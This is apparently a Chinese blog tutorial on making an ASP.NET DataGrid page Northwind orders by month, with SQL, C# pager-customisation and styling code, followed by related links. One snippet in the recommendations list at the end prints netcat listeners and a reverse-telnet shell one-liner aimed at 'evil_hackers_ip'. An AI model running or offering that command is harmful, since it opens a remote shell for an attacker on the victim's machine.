DataGrid实现逻辑分页
在ASP.NET内建提供的所有数据排列控件中,只有DataGrid数据控件是提供数据分页功能的。DataReapter数据控件只能提供一些简单 的、基础的数据重复排列功能,对于一些比较复杂的应用是无能为 力的;而DataList数据控件设计的目的在于按照固定的格式列出不同数据项,也不提供数据分页,但是,如果真的需要在DataList控件中实现分页 数据导航,需要编写的代码其实也是很少的。
DataGrid数据控件作为Asp.NET中唯一可以实现数据分页的控件(使
用内建属性),它提供数据分页的两种方式,这两种数据分页实现方式的不同在于他们取得数据的内容。在使用DataGrid默认的数据分页方式的时候,我们
首先必须提供一个包含需要显示的所有数据的DataSet,然后,DataGrid根据每页页面数据量来显示的数据,使用这种数据分页方式的优点是显然
的,程序代码使用很少,而缺点就是当数据量较大的时候,这种方式是效率很低的;在使用定制分页方式的情况下,DataGrid只取得当前页需要显示的数据
量,而不是默认分页方式的所有页面数据量,这种方式的分页,其效率无疑高的多。这两种分页方式是否可以满足我们在实际开发中的所有需求呢,当然是不可能
了。然而,使用定制数据分页功能,我们可以开发出完全符合我们应用开发要求的数据分页引擎。
从以上介绍可
知,DataGrid的数据分页是没有逻辑意义的,完全是按照机械的数据量来分页,每一页的数据量是完全一样的。在本文中,我们将演示使用
DataGrid的定制分页功能来实现具有逻辑意义的分页,这样,每页的数据量就不再完全相同,而是根据数据具体情况来决定具体每页的数据量。
一、逻辑数据分页基础
在DataGrid控件中,如果按照默认的方式,每页数据量是一定的,设计者通过PageSize来设置每页需要显示的数据量,当用户点击标示数据页面
的数字的时候,DataGrid就取得该页面数据进行显示。使用定制分页的时候,DataGrid也需要通过VirtualItemCount控件来知道
当页需要显示的数据量。
一般的,用户可以选择不同DataGrid数据页面来查看自己所需要的数据,然而,我们稍微想像一下,当数据量比较大的时候,页面数量也会很多,我们将呈现给用户的是怎样的一个界面呢?
这种情况下,逻辑数据分页会怎样处理呢?假设我们需要查看某个年度公司订单的信息,比如,在SQL 2000
Server中,我们可以查询NorthWind示例数据库来查看一个年度的订单信息,这样,我们会得到几百条信息,使用DataGrid的默认分页似乎
完全可以达到要求,然而,当这些数据显示给用户的时候,他们会真的喜欢翻阅几乎整个年度的信息吗?当我们要告诉用户某个月份的信息的时候,难道告诉他们数
据在15到16页之间吗?显然,这种方式是很不友好的,有没有其他更加符合我们一般思维的分页方式呢?那就是完全按照月份来分页。在这样的分页中,页面数
量是固定的,而每页数据量是不固定的,和DataGrid默认的分页方式刚好相反。
二、逻辑数据分页的实现
在以下的举例中,我们使用SQL 2000 Server的NorthWind数据库作为试验数据库,取该数据库某一个年度的数据作为试验数据。具体代码如下:
FROM orders AS o
INNER JOIN customers AS c ON o.customerid=c.customerid
WHERE Year(orderdate)=@TheYear
然后定义一个DataGRid,该DataGrid设置了AllowPaging和AllowCustomPaging都为True,这样允许DataGrid进行数据分页:
AllowPaging="True"
AllowCustomPaging="True"
PageSize="100"
OnItemCreated="ItemCreated"
OnPageIndexChanged="PageIndexChanged">
<PagerStyle Position="top" Mode="NumericPages"
PageButtonCount="12" />
<columns>
:
</columns>
</asp:datagrid>
我
们在举例中要求每页显示的数据量是不同的,但是,即使是使用定制分页,也需要设置每页显示的具体数据量,也就是说,无论DataGrid取得的数据是多
少,我们都必须设置PageSize属性,但是这里我们每页的数据量是不等的,这样就要求我们估计每页最大数据量,在程序中使用100。因为我们需要显示
一年的数据,所以,程序中我们要设置12个页面,也就是12个链接,这样,就需要设置属性VirtualItemCount为12×100也就是
1200。另外,默认的,DataGrid显示的页面数最大是10,为了显示12也月份的数据,我们需要设置PageButtonCount属性为12。
我们先来看程序具体运行图示:
在以上的图片中,我们可以看到,每个链接对应一个月份的数据,它的具体实现方法如下:
FROM orders AS o
INNER JOIN customers AS c ON o.customerid=c.customerid
WHERE Year(orderdate)=@TheYear
AND Month(orderdate)=@ThePageIndex
这样,根据用户选择的年份和数据页面,就可以确定需要显示的数据。很简单的,我们按照这个方法也可以做到按照子母分页的功能,这对于按照名字显示信息是非常有用的。
三、数据页面栏
无疑,上面的数据分页已经基本达到我们的要求,然而,我们可以使其更加具有吸引力,那就是将以上表示月份的数字改为具体的月份名称,为了做到这一点,我们实现需要捕捉DataGrid的ItemCreated事件:
DataGridItemEventArgs e)
{
ListItemType lit = e.Item.ItemType;
if (lit == ListItemType.Pager)
{...}
}
然后,将表示月份的数字替换为月份的名字,为了区分当前显示月份和其他月份,使用Label来显示当前月份,不可点击,使用LinkButton来表示其他月份,可以点击选择。
for(int i=0; i<pager.Controls.Count; i+=2)
{
Object o = pager.Controls[i];
if (o is LinkButton)
{
LinkButton lb = (LinkButton) o;
DateTime dt = new DateTime(2002,
Convert.ToInt32(lb.Text), 1);
lb.Text = dt.ToString("MMM");
}
}
以上效果如图(图二):
四、数据页面栏外观设置
上图我们看到,数据页面栏已经实现了月份表示,但是,它的效果非常漂亮,怎样实现呢?
首先,需要设置以下样式:
<ItemStyle BackColor="White" height="16px" />
然后设置Link的样式如下:
lb.BorderWidth = 1;
lb.BorderColor = Color.White;
lb.BorderStyle = BorderStyle.Outset;
lb.BackColor = Color.LightYellow;
为了Label有类似3D的选项页效果,这样设置:
l.BorderWidth = 1;
l.Style["border-top"] = "SkyBlue outset 1px";
l.Style["border-left"] = "SkyBlue outset 1px";
l.Style["border-right"] = "SkyBlue outset 1px";
l.Style["border-bottom-color"] = "SkyBlue";
这样设置以后,数据分页栏就会比较有图示的效果,比较友好。
DataGrid实现逻辑分页的更多相关文章
- easyui datagrid 逻辑分页
function getGroupUsers(groupPath) { $('#tbGroupUsersList').datagrid({ width: 800, height: 100, nowra ...
- ASP.NET Aries 入门开发教程7:DataGrid的行操作(主键操作区)
前言: 抓紧勤奋,再接再励,预计共10篇来结束这个系列. 上一篇介绍:ASP.NET Aries 入门开发教程6:列表数据表格的格式化处理及行内编辑 本篇介绍主键操作区相关内容. 1:什么时候有默认的 ...
- JQuery easyUI DataGrid 创建复杂列表头(译)
» Create column groups in DataGrid The easyui DataGrid has ability to group columns, as the followin ...
- ASP.NET Aries DataGrid 配置表头说明文档
DataGrid 配置表头 字段 中文 说明 Field 字段 注意:mg_ 开头的字段为层级表头 Title 列称 OrderNum 序号 显示的顺序(冻结和非冻结列是两个组的序号) Width 列 ...
- ASP.NET Aries JSAPI 文档说明:AR.DataGrid、AR.Dictionary
AR.Global 文档 1:对象或属性: 名称 类型 说明 DG 对象 DataGrid操作对象 //datagrid集合,根据ID取出DataGrid对象,将Json当数组用. Items: ne ...
- ASP.NET Aries JSAPI 文档说明:AR.DataGrid
AR.DataGrid 文档 用法: <body> <table id="dg"></table> </body> </htm ...
- ASP.NET MVC5+EF6+EasyUI 后台管理系统(7)-MVC与EasyUI DataGrid
系列目录 本节知识点 为了符合后面更新后的重构系统,文章于2016-11-1日重写 EasyUI读取MVC后台Json数据 开始实现 我们的系统似乎越来越有趣了 首先从前端入手,开打View下面的Sh ...
- 构建ASP.NET MVC4+EF5+EasyUI+Unity2.x注入的后台管理系统(8)-MVC与EasyUI DataGrid 分页
系列目录 前言 为了符合后面更新后的重构系统,文章于2016-11-1日重写 EasyUI Datagrid在加载的时候会提交一些分页的信息到后台,我们需要根据这些信息来进行数据分页再次返回到前台 实 ...
- 控制EasyUI DataGrid高度
这次要说的是控制EasyUI的高度,平时我公司的项目,用EasyUI较多,然后datagrid这个组件是用的非常多的.平时我们都是固定高度,常见代码如下: <table ...
随机推荐
- "undefined reference to" 问题解决方法
近期在Linux下编程发现一个诡异的现象,就是在链接一个静态库的时候总是报错,类似以下这种错误: (.text+0x13): undefined reference to `func' 关于undef ...
- 反向telnet连接
首先使用nc工具进行监听: nc -l -n -v -p 80 nv -l -n -v -p 25 然后: /bin/telnet evil_hackers_ip 80 | /bin/sh | /bi ...
- postgrel 调试
http://blog.csdn.net/anzelin_ruc/article/details/8539411
- C#操作串口总结
Technorati 标签: C#,SerialPort,ReadTo,ReadTimeout 最近几天一直在调一个要长时间连续不断的操作串口,并且是多线程运行,不允许中断的服务.后来服 ...
- [WinForm] VS2010发布、打包安装程序(超全超详细)
1. 在vs2010 选择“新建项目”→“ 其他项目类型”→“ Visual Studio Installer→“安装项目”: 命名为:Setup1 . 这是在VS2010中将有三个文件夹, 1.“应 ...
- 源自梦想 自定义ViewGroup的整理_2
Android项目: 1.准备资源图片.图片放到hdip里和mdip里对想过的影响:对于320*480的模拟器,默认去mdip里去找图片资源,拿过来的图片可以直接用,清晰度不变.要是所要找的图片在hd ...
- Hadoop学习笔记(1) ——菜鸟入门
Hadoop学习笔记(1) ——菜鸟入门 Hadoop是什么?先问一下百度吧: [百度百科]一个分布式系统基础架构,由Apache基金会所开发.用户可以在不了解分布式底层细节的情况下,开发分布式程序. ...
- Androidstudio 点9图报错的问题
在eclipse上.9图能够正常使用,但是到了Androidstudio上就报错无法引用,提示找不到.9图的问题. 解决方案: Androidstudio对.9图进行了更严格的定义, 1. 如果一 ...
- 重构25-Introduce Design By Contract checks(契约式设计)
契约式设计(DBC,Design By Contract)定义了方法应该包含输入和输出验证.因此,可以确保所有的工作都是基于可用的数据,并且所有的行为都是可预料的.否则,将返回异常或错误并在方法中进行 ...
- Zendstudio 9.0.2 安装Aptana3 并且配置 jQuery
Zendstudio 9.0.2 安装Apnata3 并且配置 jQuery aptana-javascript-jquery.ruble文件夹下载地址: http://dl.dbank.com/c0 ...